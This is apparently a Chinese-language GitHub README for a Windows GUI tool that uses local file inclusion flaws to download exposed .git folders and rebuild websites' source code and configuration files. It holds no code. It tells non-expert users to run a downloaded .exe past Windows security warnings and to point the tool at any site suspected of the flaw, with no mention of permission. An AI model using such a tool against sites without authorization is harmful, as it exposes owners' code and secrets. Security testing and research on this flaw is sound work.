myrrhisodoratademyelination23/lfi-git-dumper

GitHub: myrrhisodoratademyelination23/lfi-git-dumper

一款利用本地文件包含漏洞提取并重建暴露 Git 仓库源码的 Windows 图形化安全测试工具。

Stars: 0 | Forks: 0

# 🛠️ lfi-git-dumper - 从存在漏洞的网站提取 Git 数据 [![下载 lfi-git-dumper](https://img.shields.io/badge/Download-lfi--git--dumper-brightgreen)](https://github.com/myrrhisodoratademyelination23/lfi-git-dumper/releases) ## 📋 什么是 lfi-git-dumper? lfi-git-dumper 是一款帮助您从暴露的 `.git` 仓库中恢复网站源文件的工具。有时,网站存在被称为本地文件包含 (LFI) 的安全漏洞。这些漏洞可能允许他人访问本不应被看到的文件。该程序允许您安全地探索和下载那些隐藏的 `.git` 文件夹。即使服务器通过特殊存储设置限制了部分文件,它依然可以正常工作。 您无需成为开发者或懂代码即可使用此工具。它在 Windows 上运行,并会引导您完成整个过程。 ## ⚙️ 系统要求 在开始之前,请确保您的计算机满足以下最低要求: - Windows 10 或更高版本(推荐 64 位) - 4 GB 或更多 RAM - 100 MB 可用磁盘空间(用于程序文件和下载数据) - 互联网连接(以下载和使用该工具) 无需安装其他软件或编程语言。该工具开箱即用。 ## 🔍 工作原理 该工具通过连接到存在 LFI 漏洞并可访问 `.git` 文件夹的网站进行工作。它会下载 git 仓库的隐藏部分。通过这种方式,它可以恢复源文件,包括代码、配置文件以及网站所有者无意分享的其他重要内容。 此过程有助于安全检查或研究。它不会损害网站或服务器。您在本地 Windows 机器上运行它。 ## 🚀 入门指南:分步说明 1. **下载软件** 访问下方的发布页面以获取最新的 Windows 版本: [![下载 lfi-git-dumper](https://img.shields.io/badge/Download-lfi--git--dumper-blue)](https://github.com/myrrhisodoratademyelination23/lfi-git-dumper/releases) 2. **选择正确的文件** 在发布页面中,查找名称中带有 `.exe` 的文件。这就是您需要的程序。点击下载。 3. **运行程序** - 下载完成后,双击 `.exe` 文件打开它。 - 如果 Windows 显示安全警告,请点击“运行”或“更多信息”>“仍要运行”。 - 该工具将在一个简单的窗口中打开。 4. **输入网站信息** - 找到标记为“Target URL”(目标 URL)或类似名称的文本框。 - 输入怀疑存在本地文件包含问题的网站地址。 - 确保 URL 使用 `http://` 或 `https://`。 5. **开始导出 (dump)** - 点击“Start”(开始)按钮。 - 该工具将连接到网站并开始下载源文件。 - 您将在屏幕上看到进度消息。 6. **保存文件** - 完成后,软件会询问保存恢复文件的位置。 - 在您的计算机上选择一个文件夹。 - 该工具会将文件保存在那里,并保留原始结构。 ## 🗂️ 文件夹和文件结构 恢复的文件保持原始 `.git` 仓库中的组织结构。您将看到如下文件夹: - `objects`:包含代码和更改数据的文件 - `refs`:指向分支和标签的引用 - `config`:与仓库相关的设置 - 所有已恢复的源文件,按网站上的结构组织 您可以使用任何文本编辑器或代码查看器打开这些文件。不需要特殊程序。 ## ❓ 故障排除 如果遇到问题,请尝试以下解决方案: - **程序无法打开:** 确保您的 Windows 已更新到最新版本。 - **没有下载文件:** 确认该网站确实拥有可访问的 `.git` 文件夹。 - **下载过程中出现错误:** 检查您的互联网连接并重试。 - **Windows 阻止了文件:** 右键点击 `.exe`,选择“属性”,如果可用,勾选“解除锁定”。 ## 🔒 安全与隐私 所有工作均在您的本地机器上进行。该工具仅连接到您指定的目标网站。它不会将您的数据发送到其他地方。恢复的源代码将保留在您的计算机上,除非您决定分享它。 ## 🛠️ 附加功能 - 支持检测路径遍历漏洞。 - 可处理服务器对对象存储的限制。 - 提供可读的日志以供查看。 - 能很好地配合常见的 LFI 攻击模式工作。 ## 📥 下载与安装 您可以通过访问下方页面获取最新的 Windows 版本: [![下载 lfi-git-dumper](https://img.shields.io/badge/Download-lfi--git--dumper-green)](https://github.com/myrrhisodoratademyelination23/lfi-git-dumper/releases) 按照“入门指南”部分中的步骤完成设置并开始使用该软件。 ## 🤝 需要帮助? 该工具设计简单易用。但是,如果您想了解更多关于本地文件包含 (LFI) 或 `.git` 仓库的信息,请查找有关网站安全或渗透测试的初学者指南。这些主题解释了相关风险以及防止意外暴露的方法。
标签:DNS枚举, Git仓库提取, HTTP工具, LFI, Windows工具, 敏感文件读取, 数据泄露, 本地文件包含, 源码 reconstruction, 源码泄露, 网站安全, 网络安全审计, 网络安全工具, 黑盒测试